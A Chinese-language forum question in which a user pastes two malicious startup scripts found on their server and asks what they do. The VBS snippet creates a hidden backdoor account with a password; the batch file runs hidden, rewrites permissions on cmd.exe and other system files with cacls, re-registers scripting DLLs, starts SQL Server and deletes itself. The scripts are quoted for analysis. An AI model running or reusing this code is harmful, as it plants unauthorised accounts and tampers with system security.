求各位大神帮帮忙

悬赏园豆：10 [已解决问题] 解决于 2013-02-04 10:38

下面为病毒在服务器自动启动的两端代码，各位大神给我分析分析什么意思

set wshshell=createobject("wscript.shell")
a=wshshell.run ("cmd.exe /c net user geqian geqian123",0)
b=wshshell.run ("cmd.exe /c net localgroup SYSTEMs geqian$/add",0)
c=wshshell.run ("cmd.exe /c net user geqian/active:yes",0)

@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM
del c:\docume~1\alluse~1\「开始」菜单\程序\启动\360.bat
del c:\docume~1\alluse~1\「开始」菜单\程序\启动\360.vbs
copy c:\windows\system32\cacls.exe C:\WINDOWS\system32\Com\CINTLCA.IMD
c:\windows\system32\cacls.exe C:\WINDOWS\system32\Com\CINTLCA.IMD /e /g system:f
c:\windows\system32\cacls.exe C:\WINDOWS\system32\*.vbs /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\*.inf /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\*.bat /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\*.txt /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\cmd /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\cmd.exe /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\ftp.exe /e /d system
c:\windows\system32\cacls.exe C:\WINDOWS\system32\p.exe /e /d system
c:\windows\system32\cacls.exe c:\windows\help\akples.exe /e /d system
c:\windows\system32\cacls.exe c:\windows\system32\regsvr32.exe /e /g system:
c:\windows\system32\cacls.exe c:\windows\system32\urlmon.dll /e /g system:f
c:\windows\system32\cacls.exe c:\windows\system32\shdocvw.dll /e /g system:f
c:\windows\system32\cacls.exe c:\windows\system32\jscript.dll /e /g system:f
c:\windows\system32\cacls.exe c:\windows\system32\vbscript.dll /e /g system:f
c:\windows\system32\cacls.exe c:\windows\system32\wshom.ocx /e /g system:f
regsvr32 /u /s wshom.ocx scrrun.dll
regsvr32 /s wshom.ocx scrrun.dll
net2 start mssqlserver
net1 start mssqlserver
del c:\windows\system32\c_29403011.nls
del c:\docume~1\alluse~1\「开始」菜单\程序\启动\windowsupdato.bat
del %0
exit